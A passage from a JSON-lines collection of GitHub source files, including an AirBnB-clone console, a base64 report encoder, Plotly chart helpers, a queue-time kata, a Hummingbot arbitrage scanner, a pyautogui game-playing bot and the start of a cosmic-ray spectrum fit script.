arguments\n and returns the modified arguments\n \"\"\"\n if not sys.stdin.isatty():\n print()\n return line\n\n def default(self, line):\n \"\"\"Handles commands with the form\n `. (, arg2>, ...)`\n \"\"\"\n command_parts = line.split(\".\")\n\n # Map method names to corresponding methods\n method_mapping = {\n \"all()\": self.do_all,\n \"count()\": self.do_count\n }\n\n # Check if the class (first arg) is valid\n if any(command_parts[0] == class_name for\n class_name in self.all_classes):\n # Get the method and required arguments to execute\n if command_parts[1] in method_mapping:\n method = method_mapping[command_parts[1]]\n method(f\"{command_parts[0]} {command_parts[1]}\")\n elif command_parts[1].startswith(\"show\"):\n # Extract the ID from the show command\n instance_id = command_parts[1].split('\"')[1]\n self.do_show(f\"{command_parts[0]} {instance_id}\")\n elif command_parts[1].startswith(\"destroy\"):\n # Extract the ID from the destroy command\n instance_id = command_parts[1].split('\"')[1]\n self.do_destroy(f\"{command_parts[0]} {instance_id}\")\n elif command_parts[1].startswith(\"update\"):\n # Extract various parts of the update command\n arguments = re.findall(r'\\b(?:\\w+-)*\\w+\\b|\\d+',\n command_parts[1])\n class_name, inst_id, att_name, att_value = (\n command_parts[0],\n arguments[1],\n arguments[2],\n arguments[3]\n )\n if len(arguments) == 4:\n # The exact number of arguments expected by do_update\n self.do_update(\n f\"{class_name} {inst_id} {att_name} {att_value}\"\n )\n elif len(arguments) == 6:\n # Two extra arguments so we call do_update twice\n att_name1 = arguments[4]\n att_value1 = arguments[5]\n self.do_update(\n f\"{class_name} {inst_id} {att_name} {att_value}\"\n )\n self.do_update(\n f\"{class_name} {inst_id} {att_name1} {att_value1}\"\n )\n\n def do_quit(self, arg):\n \"\"\"Quit command to exit the program\n \"\"\"\n return True\n\n def do_EOF(self, arg):\n \"\"\"(Ctrl + D) to force the program to exit\n \"\"\"\n return True\n\n def do_create(self, arg):\n \"\"\"Creates a new instance of the specified class;\n Ex: $ create BaseModel\n \"\"\"\n if not arg:\n print(\"** class name missing **\")\n return\n\n if arg in HBNBCommand.all_classes and isinstance(globals()[arg], type):\n my_instance = globals()[arg]() # Equivalent to my_instance = arg()\n my_instance.save()\n print(my_instance.id)\n else:\n print(\"** class doesn't exist **\")\n\n def do_show(self, arg):\n \"\"\"Prints the string representation of an instance\n based on the class name and id.\n \"\"\"\n if not arg:\n print(\"** class name missing **\")\n return\n\n args = arg.split()\n if len(args) < 2:\n print(\"** instance id missing **\")\n else:\n class_name = args[0]\n instance_id = args[1]\n\n if (\n class_name in globals()\n and isinstance(globals()[class_name], type)\n ):\n all_objs = storage.all()\n instance_found = False\n\n for obj_id, obj in all_objs.items():\n if (\n obj.id == instance_id\n and isinstance(obj, globals()[class_name])\n ):\n print(str(obj))\n instance_found = True\n break\n\n if not instance_found:\n print(\"** no instance found **\")\n\n else:\n print(\"** class doesn't exist **\")\n\n def do_count(self, line):\n \"\"\"Returns the number of instances of a class\n Usage: .count()\n \"\"\"\n numb_instances = len([value for key, value in storage.all().items()\n if key.startswith(line[0])])\n print(numb_instances)\n\n def do_destroy(self, line):\n \"\"\"Deletes an instance based on the class name and id\n (and saves the changes). Ex: $ destroy BaseModel 1234-1234-1234\n \"\"\"\n args = line.split()\n if not args:\n print(\"** class name missing **\")\n return\n\n class_name = args[0]\n if class_name not in globals():\n print(\"** class doesn't exist **\")\n return\n\n if len(args) < 2:\n print(\"** instance id missing **\")\n return\n\n obj_id = args[1]\n all_objs = storage.all()\n\n key = f\"{class_name}.{obj_id}\"\n if key in all_objs:\n del all_objs[key] # Delete the instance from storage\n storage.save() # Save the changes to the storage\n else:\n print(\"** no instance found **\")\n\n def do_all(self, line):\n \"\"\"Prints all string representation of all\n instances based or not on the class name.\n \"\"\"\n args = line.split()\n list = []\n\n if not args:\n all_objs = storage.all().values()\n else:\n class_name = args[0]\n if class_name not in self.all_classes:\n print(\"** class doesn't exist **\")\n return\n all_objs = [obj for obj in storage.all().values()\n if obj.__class__.__name__ == class_name]\n\n objs_formatted = [f\"[{str(obj)} {obj.to_dict()}]\"\n for obj in all_objs]\n\n for obj in objs_formatted:\n print(obj)\n\n def do_update(self, arg):\n \"\"\"\n Updates an instance based on the class name\n and id by adding or updating attribute\n \"\"\"\n args = shlex.split(arg)\n if not args:\n print(\"** class name missing **\")\n else:\n class_name = args[0]\n if (class_name in globals() and\n isinstance(globals()[class_name], type)):\n if len(args) < 2:\n print(\"** instance id missing **\")\n else:\n instance_id = args[1]\n all_objs = storage.all()\n instance_found = False\n for obj_id, obj in all_objs.items():\n if obj.id == instance_id:\n if len(args) < 3:\n print(\"** attribute name missing **\")\n else:\n if len(args) < 4:\n print(\"** value missing **\")\n else:\n attr_name = args[2]\n attr_value = args[3]\n if (attr_name not in\n ('id',\n 'created_at',\n 'updated_at')):\n if (isinstance(attr_value,\n (str, int, float))):\n setattr(obj, attr_name, attr_value)\n obj.save()\n instance_found = True\n break\n if not instance_found:\n print(\"** no instance found **\")\n else:\n print(\"** class doesn't exist **\")\n\n def emptyline(self):\n \"\"\"\n Prevents the previous command from being executed again if\n no command is given.\n \"\"\"\n pass\n\n\nif __name__ == '__main__':\n HBNBCommand().cmdloop()\n","repo_name":"AnsaYong/AirBnB_clone","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":9178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20921105024","text":"import base64\nfrom time import sleep\nfrom Core.Support import Font\nfrom Core.Support import Language\nimport os\n\nfilename = Language.Translation.Get_Language()\nfilename\n\nclass Encoder:\n\n @staticmethod\n def Encode(report):\n quest = int(input(Font.Color.BLUE + \"\\n[?]\" + Font.Color.WHITE + Language.Translation.Translate_Language(\n filename, \"Default\", \"Encode\", \"None\") + Font.Color.GREEN + \"\\n\\n[#MR.HOLMES#]\" + Font.Color.WHITE + \"-->\"))\n if quest == 1:\n EncodedFile = report.replace(\".txt\",\".mh\")\n f = open(report,\"r+\")\n reader = f.read()\n f.close()\n print(Font.Color.GREEN + \"\\n[+]\" + Font.Color.WHITE + \"ENCODING...\")\n sleep(3)\n encodingString = reader.encode(\"utf-8\")\n Base64_Byte = base64.b64encode(encodingString)\n FinalString = Base64_Byte.decode(\"utf-8\")\n f = open(EncodedFile,\"w+\",encoding=\"utf-8\")\n f.write(FinalString)\n f.close()\n print(Font.Color.YELLOW + \"[v]\" + Font.Color.WHITE + \"ENCODED REPORT: {}\".format(FinalString))\n Message = FinalString\n Message1 = Message.encode(\"utf-8\")\n Message3 = base64.b64decode(Message1)\n Message4 = Message3.decode(\"utf-8\")\n #print(Message4)\n os.remove(report)\n print(Font.Color.GREEN + \"\\n[+]\" + Font.Color.WHITE + \"ENCODING FINISHED\")\n else:\n pass","repo_name":"kamaal44/Mr.Holmes","sub_path":"Core/Support/Encoding.py","file_name":"Encoding.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"74876430226","text":"\nfrom __future__ import annotations\n\nimport itertools\nimport functools\n\nimport typing\nfrom xml.etree.ElementInclude import XINCLUDE\nimport numpy\nimport pandas\n\nimport plotly.express\nfrom plotly.express.colors import sample_colorscale\n\nfrom . import rendering\nfrom . import densities\n\nimport xtuples as xt\n\n\n# ---------------------------------------------------------------\n\nRENDERING = {None: None}\nHTML = \"HTML\"\n\ndef set_rendering(val):\n RENDERING[None] = val\n\ndef return_chart(fig):\n if RENDERING[None] == HTML:\n return rendering.render_as_html(fig)\n return fig\n\n# ---------------------------------------------------------------\n\ndef df_color_scale(df, col, color_scale):\n colors = sample_colorscale(\n color_scale, \n numpy.linspace(0, 1, len(df[col].unique()))\n )\n color_map = {\n k: v for k, v in zip(\n sorted(df[col].unique()),\n colors,\n )\n }\n return color_map\n\n# ---------------------------------------------------------------\n\ndef df_chart(\n df,\n x=\"date\",\n y=\"value\",\n title=None,\n color: typing.Optional[str]=None,\n discrete_color_scale=None,\n width=750,\n height=400,\n f_plot = plotly.express.line,\n fig=None,\n f_df = None,\n **kws,\n):\n if f_df is not None:\n df = f_df(df)\n\n if color is not None:\n kws[\"color\"] = color\n\n if discrete_color_scale is not None:\n kws[\"color_discrete_map\"] = df_color_scale(\n df,\n color,\n discrete_color_scale\n )\n\n chart = f_plot(\n data_frame=df,\n x=x,\n y=y,\n title=title,\n **kws,\n )\n if fig is None:\n fig = chart\n else:\n fig.add_trace(chart.data[0])\n \n fig.update_layout(\n autosize=False,\n width=width,\n height=height,\n )\n\n return return_chart(fig)\n\ndf_line_chart = functools.partial(\n df_chart,\n f_plot = plotly.express.line,\n render_mode=\"svg\",\n #\n)\n\ndf_bar_chart = functools.partial(\n df_chart,\n f_plot = plotly.express.bar,\n #\n)\n\ndf_scatter_chart = functools.partial(\n df_chart,\n f_plot = plotly.express.scatter,\n render_mode=\"svg\",\n #\n)\n\ndf_scatter_3d_chart = functools.partial(\n df_chart,\n f_plot = plotly.express.scatter_3d,\n # render_mode=\"svg\",\n #\n)\n\ndf_line_3d_chart = functools.partial(\n df_chart,\n f_plot = plotly.express.line_3d,\n # render_mode=\"svg\",\n #\n)\n\ndef f_df_density_df(gk, y, clip_quantile=.01):\n def f(df):\n gvs = df[gk].unique()\n vs = {\n gv: df[df[gk] == gv][y].values\n for gv in gvs\n }\n df = densities.gaussian_kde_1d_df(\n vs,\n key=gk,\n clip_quantile=clip_quantile,\n )\n return df\n return f\n\ndef df_density_chart(df, g, y, clip_quantile=.01, **kwargs):\n return df_line_chart(\n df,\n x=\"position\",\n y=\"density\",\n color=g,\n f_df = f_df_density_df(\n g, y, clip_quantile=clip_quantile\n ),\n **kwargs\n )\n\n# ---------------------------------------------------------------\n\ndef df_facet_chart(\n df,\n x=\"date\",\n y=\"value\",\n title=None,\n facet=None,\n facet_row=None,\n facet_col=None,\n color=None,\n discrete_color_scale=None,\n share_y=False,\n share_x=False,\n width=750,\n height=400,\n fig=None,\n f_plot = plotly.express.line,\n f_df = None,\n **kws,\n):\n if f_df is not None:\n df = f_df(df)\n\n if facet_row is None and facet is not None:\n assert facet_col is None, facet_col\n facet_row = facet\n\n if color is not None:\n kws[\"color\"] = color\n\n if discrete_color_scale is not None:\n kws[\"color_discrete_map\"] = df_color_scale(\n df,\n color,\n discrete_color_scale\n )\n\n chart = f_plot(\n data_frame=df,\n x=x,\n y=y,\n facet_row=facet_row,\n facet_col=facet_col,\n title=title,\n **kws,\n )\n if fig is None:\n fig = chart\n else:\n fig.add_trace(chart.data[0])\n\n if not share_x:\n fig.update_xaxes(matches=None, showticklabels=True)\n if not share_y:\n fig.update_yaxes(matches=None, showticklabels=True)\n\n fig.update_layout(\n autosize=False,\n width=width,\n height=height * len(df[facet_row].unique()),\n )\n\n return return_chart(fig)\n\ndf_facet_line_chart = functools.partial(\n df_facet_chart,\n f_plot = plotly.express.line,\n render_mode=\"svg\",\n #\n)\n\ndf_facet_bar_chart = functools.partial(\n df_facet_chart,\n f_plot = plotly.express.bar,\n #\n)\n\ndf_facet_scatter_chart = functools.partial(\n df_facet_chart,\n f_plot = plotly.express.scatter,\n render_mode=\"svg\",\n #\n)\n\ndf_facet_scatter_3d_chart = functools.partial(\n df_facet_chart,\n f_plot = plotly.express.scatter_3d,\n render_mode=\"svg\",\n #\n)\n\ndf_facet_line_3d_chart = functools.partial(\n df_facet_chart,\n f_plot = plotly.express.line_3d,\n render_mode=\"svg\",\n #\n)\n\ndef df_density_facet_chart(df, g, y, clip_quantile=.01, **kwargs):\n return df_facet_line_chart(\n df,\n x=\"position\",\n y=\"density\",\n facet=g,\n f_df = f_df_density_df(\n g, y, clip_quantile=clip_quantile\n ),\n **kwargs\n )\n\ndef f_df_density_pair_df(columns, gk, clip_quantile=.01):\n def f(df):\n pairs = [\n pair for pair in itertools.combinations(columns, 2)\n if pair[0] != pair[1]\n ]\n vs = {\n \",\".join(\n _c if isinstance(_c, str) else str(_c)\n for _c in [x, y]\n ): (\n df[x].values,\n df[y].values,\n )\n for x, y in pairs\n }\n df = densities.gaussian_kde_2d_df(\n vs,\n key=gk,\n clip_quantile=clip_quantile,\n )\n return df\n return f\n\ndef df_density_pair_chart(\n df,\n key=\"key\",\n clip_quantile=.01,\n columns = None,\n excluding=xt.iTuple(),\n facet_col=None,\n separate=False,\n **kwargs\n):\n if facet_col is not None:\n excluding = excluding.append(facet_col)\n\n if columns is None:\n columns = [\n col for col in df.columns if col not in excluding\n ]\n\n f_df = f_df_density_pair_df(\n columns, key, clip_quantile=clip_quantile\n )\n\n if facet_col is not None:\n by_v = {\n v: f_df(df[df[facet_col] == v])\n for v in df[facet_col].unique()\n }\n df = pandas.concat([\n sub_df.assign(**{\n facet_col: [v for _ in sub_df.index]\n }) for v, sub_df in by_v.items()\n ])\n else:\n df = f_df(df)\n chart_kws = dict(\n x=\"x\",\n y=\"y\",\n color=\"density\",\n color_continuous_scale=\"Blues\",\n height=400,\n width=600,\n **kwargs,\n )\n if not separate:\n return df_facet_scatter_chart(\n df,\n share_x=False,\n share_y=False,\n facet_row=key,\n facet_col=facet_col,\n **chart_kws,\n )\n return [\n df_scatter_chart(\n df[df[key] == v],\n **chart_kws,\n )\n for v in df[key].unique()\n ]\n\ndef vector_rays(nd, ns, gs, xs, ys, zs = None, i = 0, g = 0):\n assert nd.shape[-1] == 2 if zs is None else 3\n if len(nd.shape) == 1:\n nd = [nd]\n for ray in nd:\n xs.extend([0, ray[0]])\n ys.extend([0, ray[1]])\n if zs is not None:\n zs.extend([0, ray[2]])\n ns.extend([i, i])\n gs.extend([g, g])\n i += 1\n return i, len(nd)\n\nimport jax\n\n\ndef vector_ray_plot(\n vs,\n color = \"n\",\n _3d = False,\n **kws,\n):\n \n ns: list = []\n gs: list = []\n xs: list = []\n ys: list = []\n rs: list = []\n cs: list = []\n zs: typing.Optional[list] = (None if not _3d else [])\n\n i = 0\n r = 0\n c = 0\n g = 0\n\n if isinstance(vs, (numpy.ndarray, jax.numpy.ndarray)):\n if len(vs.shape) == 2:\n vs = [vs]\n for g, _vs in enumerate(vs):\n i, m = vector_rays(_vs, ns, gs,xs, ys, zs = zs, i = i, g=g)\n for _ in range(m):\n rs.extend([r, r])\n cs.extend([c, c])\n\n elif isinstance(vs, (list, xt.iTuple, tuple)):\n if isinstance(vs[0], (numpy.ndarray, jax.numpy.ndarray)):\n vs = [vs]\n for r, rvs in enumerate(vs):\n for c, cvs in enumerate(rvs):\n if len(cvs.shape) == 2:\n cvs = [cvs]\n for g, _cvs in enumerate(cvs):\n i, m = vector_rays(_cvs, ns,gs, xs, ys, zs=zs, i = i, g=g)\n for _ in range(m):\n rs.extend([r, r])\n cs.extend([c, c])\n i = 0\n\n df_cols = {\n \"n\": ns,\n \"x\": xs,\n \"y\": ys,\n \"r\": rs,\n \"c\": cs,\n \"g\": gs,\n }\n if _3d:\n assert zs is not None\n df_cols[\"z\"] = zs\n\n df = pandas.DataFrame(df_cols)\n\n f_chart = (\n df_line_chart\n if len(set(rs)) == 1 and not _3d\n else df_facet_line_chart\n if not _3d\n else df_line_3d_chart\n if len(set(rs)) == 1\n else df_facet_line_3d_chart\n )\n\n return f_chart(\n df,\n x=\"x\",\n y=\"y\",\n color=color,\n **({} if _3d else dict(\n facet_row = (\n \"r\" if len(set(rs)) > 1 else None\n ),\n facet_col = (\n \"c\" if len(set(cs)) > 1 else None\n ),\n )),\n **({} if not _3d else dict(z=\"z\")),\n **kws,\n )\n\n# ---------------------------------------------------------------\n\ndef func_graph_labels(d, dp = 2, **kwargs):\n def f_format(_v):\n return (\n ('{0:.' + '{}'.format(dp) + 'f}').format(_v)\n if isinstance(_v, float)\n else str(_v) \n )\n return {\n k: (\n \"_\".join([\n \"{}={}\".format(kk, f_format(vv))\n for kk, vv in d.items()\n ])\n if v is True\n else \"_\".join([\n \"{}={}\".format(kk, f_format(d[kk]))\n for kk in v\n ])\n )\n for k, v in kwargs.items()\n if v is not None and not isinstance(v, str)\n }\n\ndef round_if_numeric(dp):\n def f(v):\n if isinstance(v, (\n float, numpy.ndarray, jax.numpy.ndarray\n )):\n return round(v, dp)\n return v\n return f\n\ndef func_graph(\n f,\n locs, #dict\n params, # dict\n color=None,\n line_group=None,\n facet_row=None,\n facet_col=None,\n hover_name = True,\n x=\"x\",\n y=\"f\",\n df_chart=df_facet_line_chart,\n dp=2,\n **kwargs,\n): \n loc_dicts = (\n xt.iTuple(itertools.product(\n *xt.iTuple(locs.values()).map(\n xt.map(round_if_numeric(dp))\n )\n ))\n .map(xt.iTuple(locs.keys()).zip)\n .map(dict)\n )\n param_dicts = (\n xt.iTuple(itertools.product(\n *xt.iTuple(params.values()).map(\n xt.map(round_if_numeric(dp))\n )\n ))\n .map(xt.iTuple(params.keys()).zip)\n .map(dict)\n )\n data = param_dicts.product_with(loc_dicts).map(lambda ds: (\n dict(xt.iTuple(ds).map(lambda d: d.items()).flatten())\n )).map(lambda d: dict(\n **d,\n **func_graph_labels(\n d,\n dp=dp,\n color=color,\n line_group=line_group,\n facet_row=facet_row,\n facet_col=facet_col,\n hover_name = hover_name,\n ),\n **dict(f=f(**d)),\n ))\n df = pandas.DataFrame(data)\n kws = {\n k: (k if not isinstance(v, str) else v)\n for k, v in {\n \"color\": color,\n \"line_group\": line_group,\n \"facet_row\": facet_row,\n \"facet_col\": facet_col,\n \"hover_name\": hover_name,\n }.items()\n if v\n }\n return df_chart(\n df,\n x=x,\n y=y,\n **kws,\n **kwargs,\n )\n# ---------------------------------------------------------------\n","repo_name":"tomjrwilliams/xfactors","sub_path":"src/xfactors/visuals/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":12262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1046037186","text":"#https://www.codewars.com/kata/57b06f90e298a7b53d000a86\n\nimport pprint\nimport json\n\ndef queue_time(customers, n):\n queues=[]\n cashierCustCount={}\n customerCounter=0\n customerInfo={}\n #makes my queue list the length of how many cashiers (n) i have avalible\n for x in range(n):\n queues.append(0)\n cashierCustCount[x+1]=0\n\n for i in range(len(customers)):\n index = queues.index(min(queues))\n customerCounter+=1\n\n customerInfo=feedCustAPI(i,customerInfo,customers,queues,index)\n queues[index]+=customers[i]\n cashierCustCount[index+1]+=1\n\n cashierInfo=cashierFile(cashierCustCount,queues, customerInfo)\n final=combineFiles(cashierInfo,customerInfo)\n pprintAPI(final)\n printToText(final)\n return max(queues)\n\ndef combineFiles(f1, f2):\n file={\"Cashier Info\": f1, \"Customer Info\": f2}\n return file\n\ndef cashierFile(custCount, time, custInfo):\n cashierFile={}\n\n for z in custCount:\n cashierFile[z]={\"Cashier\": z, \"helped\":{\"Count\":custCount.get(z), \"Customers\":[]}, \"total work time\": time[z - 1]}\n\n\n for y in custInfo:\n if custInfo[y]['queue visited']==cashierFile[z][\"Cashier\"]:\n cashierFile[z]['helped']['Customers'].append(y)\n\n return cashierFile\n\ndef pprintAPI(file):\n pprint.pprint(file)\n\ndef printToText(file):\n fileName=input(\"What do you want to name your file? \")\n file=json.dumps(file)\n with open(f'{fileName}.json','a') as f:\n f.write(file)\n\ndef feedCustAPI(x,customerInfo,customers,queues, index):\n customerInfo[x + 1] = {'length of checkout': customers[x], 'wait time': queues[index], 'queue visited': index+1}\n return customerInfo\n\nif __name__==\"__main__\":\n #fill with any information that you have\n cust=[1,2,3,1,7,5,6,7,8,4,1,2,3,4,5,6,5,4,7,6,5,4,3,2,1,3,4,6]\n n=8\n print(f'{queue_time(cust, n)} is the time it would take {len(cust)} customers with {n} cashiers')\n","repo_name":"jaceiverson/Python-Projects","sub_path":"CodeWars/queueTimes.py","file_name":"queueTimes.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22195059356","text":"# start --script 2script.py\n\nfrom decimal import Decimal\n\nfrom hummingbot.strategy.script_strategy_base import ScriptStrategyBase\nfrom hummingbot.core.utils.trading_pair_fetcher import TradingPairFetcher\n\ns_decimal_0 = Decimal(0)\n\n\nclass ArbitrageFinder1(ScriptStrategyBase):\n # It is best to first use a paper trade exchange connector\n # while coding your strategy, once you are happy with it\n # then switch to real one.\n arbitrage_markets = [\"gate_io_paper_trade\", \"ascend_ex_paper_trade\"]\n\n trading_pair_fetcher: TradingPairFetcher = TradingPairFetcher.get_instance()\n if trading_pair_fetcher.ready:\n trading_pairs_1 = trading_pair_fetcher.trading_pairs.get(arbitrage_markets[0], [])\n trading_pairs_2 = trading_pair_fetcher.trading_pairs.get(arbitrage_markets[1], [])\n trading_pairs_set = list(set(trading_pairs_1).intersection(trading_pairs_2))\n trading_pairs_set = trading_pairs_set[0:50]\n\n markets = {arbitrage_markets[0]: trading_pairs_set, arbitrage_markets[1]: trading_pairs_set}\n min_profitability = Decimal('0.007')\n\n def on_tick(self):\n self.logger().info(f\"trading_pairs_1 {self.trading_pairs_set}\")\n self.notify_hb_app_with_timestamp(f\"1: {self.arbitrage_markets[0]}; 2: {self.arbitrage_markets[1]}\")\n for pair in self.trading_pairs_set:\n try:\n market_1_bid = self.connectors[self.arbitrage_markets[0]].get_price(pair, False)\n market_1_ask = self.connectors[self.arbitrage_markets[0]].get_price(pair, True)\n market_2_bid = self.connectors[self.arbitrage_markets[1]].get_price(pair, False)\n market_2_ask = self.connectors[self.arbitrage_markets[1]].get_price(pair, True)\n profitability_buy_1_sell_2 = market_1_bid / market_2_ask - 1\n profitability_buy_2_sell_1 = market_2_bid / market_1_ask - 1\n\n if profitability_buy_1_sell_2 > self.min_profitability:\n self.notify_hb_app_with_timestamp(f\"{pair}: buy_1_sell_2: {profitability_buy_1_sell_2:.5f}\")\n if profitability_buy_2_sell_1 > self.min_profitability:\n self.notify_hb_app_with_timestamp(f\"{pair}: buy_2_sell_1: {profitability_buy_2_sell_1:.5f}\")\n except BaseException:\n self.logger().info(f\"{pair} has no bid or ask order book\")\n","repo_name":"andrewsiah/Arbitrage_Bot","sub_path":"scripts/arbitragefinder1.py","file_name":"arbitragefinder1.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5163504664","text":"#! python3\n# -- cardinalBot.py -- little bot to autonomously play the game Cardinal under the following URL:\n# https://www.newgrounds.com/portal/view/634256\n\n### Hufi\n### 25/07/2020 - 27/07/2020\n\nimport pyautogui, sys, os, time, logging, webbrowser\n\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s.%(msecs)03d: %(message)s', datefmt='%H:%M:%S')\n#logging.disable(logging.DEBUG) # uncomment ot block debug log messages\n\n\ndef imgPath(image):\n # makes it easier to generate the path used to locate the image Files.\n return os.path.join('FILEPATH IMAGES' + image)\n\n# VARIABLES USED:\n\nGAME_REGION = () # region, where the game is located on screen.\n\n\nscore = 0 # well, the score.\n\n\ndef main():\n # main function calling every other function in the game. Called at the very end.\n logging.debug('Program Started. Press Ctrl-C to abort at any time.')\n logging.debug('To interrupt mouse movement, move mouse to upper left corner.')\n openGame()\n locateGameRegion()\n startGame()\n playGame()\n checkLost()\n\ndef openGame():\n game = webbrowser.open('https://www.newgrounds.com/portal/view/634256') # open the webpage in browser.\n time.sleep(15) # timer to let the webpage load\n\n\n\ndef locateGameRegion():\n # function to recognize and locate the game on the screen.\n global GAME_REGION\n region = pyautogui.locateOnScreen(imgPath('press_m_to_mute.png')) # lower left corner used as starting point for calculation.\n if region is None: # because it is always looking the same (press m to mute)\n raise Exception('Could not find the game on the screen.') # Exception to let us know that the game isn't visible.\n\n topLeftX = region[0]\n topLeftY = region[1] + region[3] - 550 # image(upper border) + [abs.height of img] minus game height.\n GAME_REGION = (topLeftX, topLeftY, 550, 550) # game regioncoordinates, height and width\n logging.debug('Game region found: %s' % (GAME_REGION,))\n\n\n\ndef startGame():\n # clicks the center of the game and then starts the game.\n dot = pyautogui.locateCenterOnScreen(imgPath('center.png'), region=GAME_REGION)\n pyautogui.click(dot) # click center\n time.sleep(0.75)\n pyautogui.press('space') # start game by pressing space\n pyautogui.press('m') # mute the game (the sound is annoying when playing it for the 17596th time.\n\n\ndef playGame():\n global score\n while True:\n time.sleep(0.4) # gives us a little extra time in between each patterns\n screenshot = pyautogui.screenshot() # creates new screenshot to use within each loop\n if screenshot.getpixel((GAME_REGION[0] + 504, GAME_REGION[1] + 537)) == (170, 16, 48):\n # color code of the red color used in the game. if this specific pixel (within the \"T\" in press Space To play) is red, then the game is stopped/lost.\n logging.debug('You lost. Your Score: %s' % (score-6)) # Score: subtract 6 to get to the actual points( beginning and end have multiple entries.\n logging.debug('Do you want to play again? (Y/N)') # usually: 6 multiple entries per game --> therefore substract that amount.\n antwort = input()\n if antwort.lower() == 'y':\n pyautogui.click((GAME_REGION[0] + 200, GAME_REGION[1] + 200))\n pyautogui.press('space') # restart game\n score = 0 # reset score\n\n else:\n logging.debug('Ok ciao!') # display goodbye msg\n time.sleep(3)\n sys.exit() # exit bot\n\n\n elif screenshot.getpixel((GAME_REGION[0] + 504, GAME_REGION[1] + 537)) != (170, 16, 48): # pixel not red here, therefore game is still going.\n\n if screenshot.getpixel((GAME_REGION[0] + 100, GAME_REGION[1] + 155)) != (176, 1, 26): # pixel within left red block is not red: left block missing.\n pyautogui.press(\"left\") # therefore: press 'left' key.\n logging.debug('left')\n score +=1\n\n elif screenshot.getpixel((GAME_REGION[0] + 483, GAME_REGION[1] + 155)) != (176, 1, 26):\n pyautogui.press(\"right\") # for the other 3 options: same with corresponding direction\n logging.debug('right')\n score +=1\n\n elif screenshot.getpixel((GAME_REGION[0] + 273, GAME_REGION[1] + 75)) != (176, 1, 26):\n pyautogui.press(\"up\")\n logging.debug('up')\n score +=1\n\n elif screenshot.getpixel((GAME_REGION[0] + 273, GAME_REGION[1] + 420)) != (176, 1, 26):\n pyautogui.press(\"down\")\n logging.debug('down')\n score +=1\n\n\n# actually running the program:\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"hufi1/Cardinal-Bot","sub_path":"cardinalBot.py","file_name":"cardinalBot.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21548353767","text":"'''\n求解属性值和权重值均为直觉模糊集合的多属性线性规划方法。\n主要思想是吧直觉模糊集合转化为区间值进行权重的区间求解。\n'''\nfrom scipy import optimize as op\nimport pandas as pd#bikor算法实现\nimport numpy as np\nnp.set_printoptions(suppress=True)\nw=[0.25,0.45,0.3]\ndef getdef(n):#获取矩阵\n return pd.read_excel('D:\\study\\\\test\\data\\\\t13.xlsx',sheet_name=n)\ndef getmatirx(df):\n df.iloc[:, [i % 2 == 1 for i in range(len(df.columns))]] = 1 - df.iloc[:,\n [i % 2 == 1 for i in range(len(df.columns))]]\n return df\ndef getliner(df):\n pass\ndef ranks(df):\n d1 = df.iloc[:, ::2]\n d2 = df.iloc[:, 1::2]\n df1=d1.T.reset_index(drop=True).T\n df2= d2.T.reset_index(drop=True).T\n print(df1)\n print(df2)\n gl=np.dot(df1,w)\n gu=np.dot(df2,w)\n print(gl)\n print(gu)\n g=gu/(1+gu-gl)\n return g\nif __name__ == '__main__':\n df =getdef(0)\n print(df)\n df1=getmatirx(df)\n print(df1)\n print(ranks(df1))","repo_name":"rivendelltom/ifs_learn","sub_path":"book/LP_Weight.py","file_name":"LP_Weight.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"17735055494","text":"import sys\nimport os\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.table import Table\n\nfrom combined_fit import spectrum as sp\nfrom combined_fit import constant,utilities\nfrom combined_fit import mass\nfrom combined_fit import tensor as ts\nfrom combined_fit import draw\n\n\n### Main ##########################################################\nif __name__ == \"__main__\":\n\n ################################# Inputs ##################################\n ###########################################################################\n\n #Injected masses\n A\t= [\t1,\t 4,\t14,\t28,\t56]\n Z\t= [\t1,\t 2, 7,\t14, 26]\n\n hadr_model = \"Sibyll\" #\"Sibyll\" or \"EPOS-LHC\"\n logRmin = 17.8 #Integrate the injected spectrum from logR_min to get total energy x k\n logE_th = 18.75 # Compute the deviance from logE_th\n isSFR = True # True for SFRD, False for SMD\n\n #Best-fit parameters, inferred with Examples/Fit.py\n if isSFR:\n key = \"sfrd\"#solar mass / (yr.Mpc3)\n logRcut, gamma_nucl, gamma_p = 18.28, -0.36, 2.64\n E_times_k = [9.06E+45, 6.79E+45, 2.30E+46, 7.11E+45, 1.69E+45]\n unit_E_times_k = \"erg per solar mass\"\n sigma_shift_sys = 1.20\n else:\n key = \"smd\" #solar mass / Mpc3\n logRcut, gamma_nucl, gamma_p = 18.41, 0.62, 3.02\n E_times_k = [2.27E+36, 2.13E+35, 1.33E+36, 1.78E+35, 1.77E+35]\n unit_E_times_k = \"erg per solar mass per year\"\n sigma_shift_sys = 1.54\n\t\t\n ################################# Tensor ##################################\n ###########################################################################\n S_z = ts.Load_evol(file = key+\"_local.dat\", key=key)\n w_zR_nucl = sp.weight_tensor(S_z, gamma_nucl, logRcut)\n w_zR_p = sp.weight_tensor(S_z, gamma_p, logRcut)\n Tensor = ts.upload_Tensor(logRmin = logRmin)\n\n ################################## Plot ###################################\n ###########################################################################\n\n plt.rcParams.update({'font.size': 14,'legend.fontsize': 12})\n\n sp.Plot_spectrum(\tTensor, E_times_k, ts.A, ts.Z, w_zR_nucl, w_zR_p, logE_th, hadr_model, isE3dJdE= False, isRenormalized=False, ext_save=key)\n mass.Plot_Xmax(\tTensor, E_times_k, sigma_shift_sys, ts.A, ts.Z, w_zR_nucl, w_zR_p, logE_th, 